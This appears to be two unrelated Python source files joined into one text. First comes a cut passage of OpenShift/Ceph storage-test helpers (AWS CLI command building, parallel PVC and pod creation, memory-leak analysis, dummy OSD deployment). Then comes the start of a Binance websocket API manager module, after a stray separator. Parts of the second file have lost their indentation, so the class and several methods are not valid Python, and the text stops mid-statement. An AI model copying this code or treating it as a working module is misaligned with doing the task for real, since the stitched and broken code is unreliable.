        mcg_obj: An MCG object containing the MCG S3 connection credentials,
            or a falsy value for an anonymous (no-sign-request) command
        cmd: The AWSCLI command to run

    Returns:
        str: The crafted command, ready to be executed on the pod

    """
    if not mcg_obj:
        # Anonymous access: no credentials, no shell wrapper needed.
        return f"aws s3 --no-verify-ssl --no-sign-request {cmd}"
    base_command = (
        f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
        f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
        f"AWS_DEFAULT_REGION={mcg_obj.region} "
        f"aws s3 "
        f"--endpoint={mcg_obj.s3_endpoint} "
        f"--no-verify-ssl "
    )
    return base_command + cmd + "\""
def wait_for_resource_count_change(
    func_to_use, previous_num, namespace, change_type='increase',
    min_difference=1, timeout=20, interval=2, **func_kwargs
):
    """
    Wait for a change in total count of PVC or pod.

    Args:
        func_to_use (function): Function to be used to fetch resource info
            Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
        previous_num (int): Previous number of pods/PVCs for comparison
        namespace (str): Name of the namespace
        change_type (str): Type of change to check. Accepted values are
            'increase' and 'decrease'. Default is 'increase'.
        min_difference (int): Minimum required difference in PVC/pod count
        timeout (int): Maximum wait time in seconds
        interval (int): Time in seconds to wait between consecutive checks

    Returns:
        True if difference in count is greater than or equal to
        'min_difference'. False in case of timeout.

    """
    try:
        for sample in TimeoutSampler(
            timeout, interval, func_to_use, namespace, **func_kwargs
        ):
            # get_all_pods returns a list; get_all_pvcs returns a dict.
            if func_to_use == pod.get_all_pods:
                current_num = len(sample)
            else:
                current_num = len(sample['items'])
            if change_type == 'increase':
                difference = current_num - previous_num
            else:
                difference = previous_num - current_num
            if difference >= min_difference:
                return True
    except TimeoutExpiredError:
        return False
def verify_pv_mounted_on_node(node_pv_dict):
    """
    Check if mount point of a PV exists on a node

    Args:
        node_pv_dict (dict): Node to PV list mapping
            eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}

    Returns:
        dict: Node to existing PV list mapping
            eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
    """
    existing_pvs = {}
    for node_name, pv_names in node_pv_dict.items():
        # One `df` call per node; each mounted PV shows up as a path segment
        df_output = run_cmd(f'oc debug nodes/{node_name} -- df')
        existing_pvs[node_name] = [
            pv for pv in pv_names if f"/pv/{pv}/" in df_output
        ]
    return existing_pvs
def converge_lists(list_to_converge):
    """
    Flatten a list of lists (as produced by future objects) into one list

    Args:
        list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]

    Returns:
        list (list): return converged list eg: [1,2,3,4]
    """
    flattened = []
    for sublist in list_to_converge:
        flattened.extend(sublist)
    return flattened
def create_multiple_pvc_parallel(
    sc_obj, namespace, number_of_pvc, size, access_modes
):
    """
    Funtion to create multiple PVC in parallel using threads
    Function will create PVCs based on the available access modes

    Args:
        sc_obj (str): Storage Class object
        namespace (str): The namespace for creating pvc
        number_of_pvc (int): NUmber of pvc to be created
        size (str): size of the pvc eg: '10Gi'
        access_modes (list): List of access modes for PVC creation

    Returns:
        pvc_objs_list (list): List of pvc objs created in function
    """
    # One creation batch per access mode, fanned out over a thread pool
    creation_futures = []
    with ThreadPoolExecutor() as executor:
        for access_mode in access_modes:
            creation_futures.append(
                executor.submit(
                    create_multiple_pvcs, sc_name=sc_obj.name,
                    namespace=namespace, number_of_pvc=number_of_pvc,
                    access_mode=access_mode, size=size)
            )
    pvc_objs_list = converge_lists(
        [future.result() for future in creation_futures]
    )
    # Check for all the pvcs in Bound state
    status_futures = []
    with ThreadPoolExecutor() as executor:
        for pvc_obj in pvc_objs_list:
            status_futures.append(
                executor.submit(wait_for_resource_state, pvc_obj, 'Bound')
            )
    if False in [future.result() for future in status_futures]:
        raise TimeoutExpiredError
    return pvc_objs_list
def create_pods_parallel(pvc_list, namespace, interface, raw_block_pv=False):
    """
    Function to create pods in parallel

    Args:
        pvc_list (list): List of pvcs to be attached in pods
        namespace (str): The namespace for creating pod
        interface (str): The interface backed the PVC
        raw_block_pv (bool): Either RAW block or not

    Returns:
        pod_objs (list): Returns list of pods created

    Raises:
        TimeoutExpiredError: if any pod did not reach Running state in time
    """
    # Added 300 sec wait time since in scale test once the setup has more
    # PODs time taken for the pod to be up will be based on resource available
    wait_time = 300
    pod_dict_path = (
        constants.CSI_RBD_RAW_BLOCK_POD_YAML if raw_block_pv else None
    )
    creation_futures = []
    with ThreadPoolExecutor() as executor:
        for pvc_obj in pvc_list:
            creation_futures.append(executor.submit(
                create_pod, interface_type=interface,
                pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
                raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path)
            )
    pod_objs = [future.result() for future in creation_futures]
    # Pod creation above does not wait for Running state because of threads
    # usage, so wait for all the pods to reach Running state here.
    # NOTE: the wait futures are kept in a separate list; the original code
    # appended them to the creation futures list and re-checked those too.
    status_futures = []
    with ThreadPoolExecutor() as executor:
        for pod_obj in pod_objs:
            status_futures.append(
                executor.submit(
                    wait_for_resource_state, pod_obj, 'Running',
                    timeout=wait_time
                )
            )
    # If pods not up raise exception/failure
    if False in [future.result() for future in status_futures]:
        raise TimeoutExpiredError
    return pod_objs
def delete_objs_parallel(obj_list):
    """
    Delete the given objects in parallel, one thread per object

    Args:
        obj_list(list): List can be obj of pod, pvc, etc

    Returns:
        bool: True if obj deleted else False
    """
    delete_threads = []
    # Kick off one deletion thread per object, then wait for all of them
    for obj in obj_list:
        worker = threading.Thread(target=obj.delete)
        worker.start()
        delete_threads.append(worker)
    for worker in delete_threads:
        worker.join()
    return True
def _top_mem_value_to_kb(value):
    """
    Convert a memory value as printed by `top` to KB.

    `top` prints plain KB values, or values suffixed with 'm' (MB) or
    'g' (GB).

    Args:
        value (str): memory value string, e.g. '102400', '512m', '1.5g'

    Returns:
        float: the value converted to KB
    """
    if 'g' in value:
        return float(1024 ** 2 * float(value[:-1]))
    elif 'm' in value:
        return float(1024 * float(value[:-1]))
    return float(value)
def memory_leak_analysis(median_dict):
    """
    Function to analyse Memory leak after execution of test case
    Memory leak is analyzed based on top output "RES" value of ceph-osd daemon,
    i.e. field index 7 in the parsed top output line

    Args:
        median_dict (dict): dict of worker nodes and respective median value
            eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}

    More Detail on Median value:
        For calculating memory leak require a constant value, which should not be
        start or end of test, so calculating it by getting memory for 180 sec
        before TC execution and take a median out of it.
        Memory value could be different for each nodes, so identify constant value
        for each node and update in median_dict

    Usage:
        test_case(.., memory_leak_function):
            .....
            median_dict = helpers.get_memory_leak_median_value()
            .....
            TC execution part, memory_leak_fun will capture data
            ....
            helpers.memory_leak_analysis(median_dict)
            ....

    Raises:
        UnexpectedBehaviour: if a worker's top output file is missing, or a
            memory growth of more than 20% is detected on any worker
    """
    # dict to store memory leak difference for each worker
    diff = {}
    for worker in get_worker_nodes():
        memory_leak_data = []
        top_output_file = f"/tmp/{worker}-top-output.txt"
        if os.path.exists(top_output_file):
            with open(top_output_file, "r") as f:
                data = f.readline()
                # RES is the 8th whitespace-separated field of a top line;
                # `fields` avoids shadowing the builtin `list`
                fields = [i for i in data.split(" ") if i]
                memory_leak_data.append(fields[7])
        else:
            logging.info(f"worker {worker} memory leak file not found")
            raise UnexpectedBehaviour
        number_of_lines = len(memory_leak_data) - 1
        # Get the start value form median_dict arg for respective worker
        start_value = median_dict[f"{worker}"]
        end_value = memory_leak_data[number_of_lines]
        logging.info(f"Median value {start_value}")
        logging.info(f"End value {end_value}")
        # Convert the values to kb for calculations
        start_value = _top_mem_value_to_kb(start_value)
        end_value = _top_mem_value_to_kb(end_value)
        # Calculate the percentage of diff between start and end value
        # Based on value decide TC pass or fail
        diff[worker] = ((end_value - start_value) / start_value) * 100
        logging.info(f"Percentage diff in start and end value {diff[worker]}")
        if diff[worker] <= 20:
            logging.info(f"No memory leak in worker {worker} passing the test")
        else:
            logging.info(f"There is a memory leak in worker {worker}")
            logging.info(f"Memory median value start of the test {start_value}")
            logging.info(f"Memory value end of the test {end_value}")
            raise UnexpectedBehaviour
def get_memory_leak_median_value():
    """
    Function to calculate memory leak Median value by collecting the data for 180 sec
    and find the median value which will be considered as starting point
    to evaluate memory leak using "RES" value of ceph-osd daemon i.e. field
    index 7 of the parsed top output line

    Returns:
        median_dict (dict): dict of worker nodes and respective median value

    Raises:
        UnexpectedBehaviour: if a worker's top output file is missing
    """
    median_dict = {}
    timeout = 180  # wait for 180 sec to evaluate memory leak median data.
    logger.info(f"waiting for {timeout} sec to evaluate the median value")
    time.sleep(timeout)
    for worker in get_worker_nodes():
        memory_leak_data = []
        top_output_file = f"/tmp/{worker}-top-output.txt"
        if os.path.exists(top_output_file):
            with open(top_output_file, "r") as f:
                data = f.readline()
                # RES is the 8th whitespace-separated field of a top line;
                # `fields` avoids shadowing the builtin `list`
                fields = [i for i in data.split(" ") if i]
                memory_leak_data.append(fields[7])
        else:
            logging.info(f"worker {worker} memory leak file not found")
            raise UnexpectedBehaviour
        # NOTE(review): the collected values are strings, so median() would
        # compare them lexicographically; with the single sample read above
        # this is harmless - confirm if multiple samples are ever collected.
        median_dict[f"{worker}"] = statistics.median(memory_leak_data)
    return median_dict
def refresh_oc_login_connection(user=None, password=None):
    """
    Refresh the oc user login session

    Default login using kubeadmin user and password

    Args:
        user (str): Username to login
        password (str): Password to login
    """
    user = user or config.RUN['username']
    if not password:
        # Read the kubeadmin password from the cluster directory
        password_file = os.path.join(
            config.ENV_DATA['cluster_path'],
            config.RUN['password_location']
        )
        with open(password_file) as f:
            password = f.read()
    ocp.OCP().login(user=user, password=password)
def rsync_kubeconf_to_node(node):
    """
    Function to copy kubeconfig to OCP node

    Copies the auth directory (containing the kubeconfig) to the node's
    /home/core/ if it is not already present there.

    Args:
        node (str): OCP node to copy kubeconfig if not present
    """
    filename = os.path.join(
        config.ENV_DATA['cluster_path'],
        config.RUN['kubeconfig_location']
    )
    file_path = os.path.dirname(filename)
    master_list = get_master_nodes()
    ocp_obj = ocp.OCP()
    check_auth = 'auth'
    check_conf = 'kubeconfig'
    node_path = '/home/core/'
    # NOTE(review): presence is checked on the first master node while the
    # rsync targets `node` - confirm this asymmetry is intentional
    if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
        ocp.rsync(
            src=file_path, dst=f"{node_path}", node=node, dst_node=True
        )
    elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
        ocp.rsync(
            src=file_path, dst=f"{node_path}", node=node, dst_node=True
        )
def create_dummy_osd(deployment):
    """
    Replace one of OSD pods with pod that contains all data from original
    OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
    to Ceph Placement Groups.

    Args:
        deployment (str): Name of deployment to use

    Returns:
        list: first item is dummy deployment object, second item is dummy pod
            object
    """
    oc = OCP(
        kind=constants.DEPLOYMENT,
        namespace=config.ENV_DATA.get('cluster_namespace')
    )
    osd_data = oc.get(deployment)
    dummy_deployment = create_unique_resource_name('dummy', 'osd')
    osd_data['metadata']['name'] = dummy_deployment
    osd_containers = osd_data.get('spec').get('template').get('spec').get(
        'containers'
    )
    # get osd container spec
    original_osd_args = osd_containers[0].get('args')
    # Replace the osd daemon entrypoint with an idle command so the pod keeps
    # the OSD's mounts but does not run the daemon itself
    osd_data['spec']['template']['spec']['containers'][0]['args'] = []
    osd_data['spec']['template']['spec']['containers'][0]['command'] = [
        '/bin/bash',
        '-c',
        'sleep infinity'
    ]
    # Write the modified deployment through the tempfile handle; the context
    # manager closes it (the original leaked the handle by reopening the file
    # by name) and delete=False keeps the file around for `oc create`
    with tempfile.NamedTemporaryFile(
        mode='w+', prefix=dummy_deployment, delete=False
    ) as osd_file:
        yaml.dump(osd_data, osd_file)
    oc.create(osd_file.name)
    # downscale the original deployment and start dummy deployment instead
    oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
    oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
    osd_list = pod.get_osd_pods()
    # `osd_pod` as the loop variable - the original comprehension shadowed
    # the `pod` module
    dummy_pod = [
        osd_pod for osd_pod in osd_list if dummy_deployment in osd_pod.name
    ][0]
    wait_for_resource_state(
        resource=dummy_pod,
        state=constants.STATUS_RUNNING,
        timeout=60
    )
    ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
    try:
        logger.info('Following command should expire after 7 seconds')
        dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
    except TimeoutExpired:
        logger.info('Killing /rook/tini process')
        try:
            dummy_pod.exec_bash_cmd_on_pod(
                "kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
            )
        except CommandFailed:
            pass
    return dummy_deployment, dummy_pod
def get_failure_domin():
    """
    Get the failure domain of the cephblockpool crush rule

    Returns:
        str: Failure domain from cephblockpool
    """
    tools_pod = pod.get_ceph_tools_pod()
    crush_rules = tools_pod.exec_ceph_cmd(
        ceph_cmd="ceph osd crush rule dump", format='json'
    )
    assert crush_rules, "Failed to get cmd output"
    pool_name = constants.CEPHBLOCKPOOL.lower()
    for rule in crush_rules:
        if pool_name not in rule.get("rule_name"):
            continue
        # First step that carries a "type" key holds the failure domain
        for step in rule.get("steps"):
            if "type" in step:
                return step.get("type")
|
unicorn_binance_websocket_api_manager.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of 'UNICORN Binance WebSocket API'
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import json # Disable ujson
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance Websocket API`s (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, jersey, us, jex, dex/chain+testnet) in a easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.je websocket API documentation:
- https://github.com/binance-jersey/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-jersey/binance-official-api-docs/blob/master/user-data-stream.md
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.je, binance.us, jex.com, binance.org or binance.org-testnet
(default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.28.0.dev"
logging.info(f"New instance of {self.get_user_agent()} on {str(platform.system())} {str(platform.release())} "
f"started ...")
colorama.init()
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logging.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logging.info(f"Using `process_stream_data`")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.je":
self.websocket_base_uri = "wss://stream.binance.je:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logging.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer = []
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = []
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logging.warning(update_msg)
    def _add_stream_to_stream_list(self,
                                   stream_id,
                                   channels,
                                   markets,
                                   stream_label=None,
                                   stream_buffer_name=False,
                                   api_key=False,
                                   api_secret=False,
                                   symbols=False,
                                   output=False,
                                   ping_interval=False,
                                   ping_timeout=False,
                                   close_timeout=False):
        """
        Create a list entry for new streams

        :param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
        :type stream_id: uuid
        :param channels: provide the channels to create the URI
        :type channels: str, tuple, list, set
        :param markets: provide the markets to create the URI
        :type markets: str, tuple, list, set
        :param stream_label: provide a stream_label for the stream
        :type stream_label: str
        :param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
                                   set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
                                   provide a string to create and use a shared stream_buffer and read it via
                                   `pop_stream_data_from_stream_buffer('string')`.
        :type stream_buffer_name: bool or str
        :param api_key: provide a valid Binance API key
        :type api_key: str
        :param api_secret: provide a valid Binance API secret
        :type api_secret: str
        :param symbols: provide the symbols for isolated_margin user_data streams
        :type symbols: str
        :param output: the default setting `raw_data` can be globaly overwritten with the parameter
                       `output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
                       of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
                       set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
                       convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
                       the default setting "raw_data" the output remains unchanged and gets delivered as received from
                       the endpoints
        :param ping_interval: Once the connection is open, a `Ping frame` is sent every
                              `ping_interval` seconds. This serves as a keepalive. It helps keeping
                              the connection open, especially in the presence of proxies with short
                              timeouts on inactive connections. Set `ping_interval` to `None` to
                              disable this behavior. (default: 20)
                              This parameter is passed through to the `websockets.client.connect()
                              <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
        :type ping_interval: int or None
        :param ping_timeout: If the corresponding `Pong frame` isn't received within
                             `ping_timeout` seconds, the connection is considered unusable and is closed with
                             code 1011. This ensures that the remote endpoint remains responsive. Set
                             `ping_timeout` to `None` to disable this behavior. (default: 20)
                             This parameter is passed through to the `websockets.client.connect()
                             <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
        :type ping_timeout: int or None
        :param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
                              completing the closing handshake and terminating the TCP connection. (default: 10)
                              This parameter is passed through to the `websockets.client.connect()
                              <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
        :type close_timeout: int or None
        :type output: str
        """
        # Fall back to the manager-wide default output format when no stream
        # specific `output` was requested
        if output is False:
            output = self.output_default
        # Per-stream locks used when touching this stream's state/statistics
        self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
                                                 'receives_statistic_last_second_lock': threading.Lock()}
        # Full bookkeeping record for this stream; deepcopy detaches the
        # stored values from the caller's objects
        self.stream_list[stream_id] = {'exchange': self.exchange,
                                       'stream_id': copy.deepcopy(stream_id),
                                       'recent_socket_id': None,
                                       'channels': copy.deepcopy(channels),
                                       'markets': copy.deepcopy(markets),
                                       'stream_label': copy.deepcopy(stream_label),
                                       'stream_buffer_name': copy.deepcopy(stream_buffer_name),
                                       'symbols': copy.deepcopy(symbols),
                                       'output': copy.deepcopy(output),
                                       'subscriptions': 0,
                                       'payload': [],
                                       'api_key': copy.deepcopy(api_key),
                                       'api_secret': copy.deepcopy(api_secret),
                                       'dex_user_address': copy.deepcopy(self.dex_user_address),
                                       'ping_interval': copy.deepcopy(ping_interval),
                                       'ping_timeout': copy.deepcopy(ping_timeout),
                                       'close_timeout': copy.deepcopy(close_timeout),
                                       'status': 'starting',
                                       'start_time': time.time(),
                                       'processed_receives_total': 0,
                                       'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
                                       'seconds_to_last_heartbeat': None,
                                       'last_heartbeat': None,
                                       'kill_request': None,
                                       'stop_request': None,
                                       'crash_request': None,
                                       'seconds_since_has_stopped': None,
                                       'has_stopped': False,
                                       'reconnects': 0,
                                       'logged_reconnects': [],
                                       'processed_transmitted_total': 0,
                                       'last_static_ping_listen_key': 0,
                                       'listen_key': False,
                                       'listen_key_cache_time': 30 * 60,
                                       'last_received_data_record': None,
                                       'processed_receives_statistic': {},
                                       'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
        logging.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
                     str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
                     + str(stream_buffer_name) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
restart=False):
"""
Co function of self.create_stream to create a thread for the socket and to manage the coroutine
:param loop: provide a asynio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param restart: set to `True`, if its a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
self.stream_buffers[stream_buffer_name] = []
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
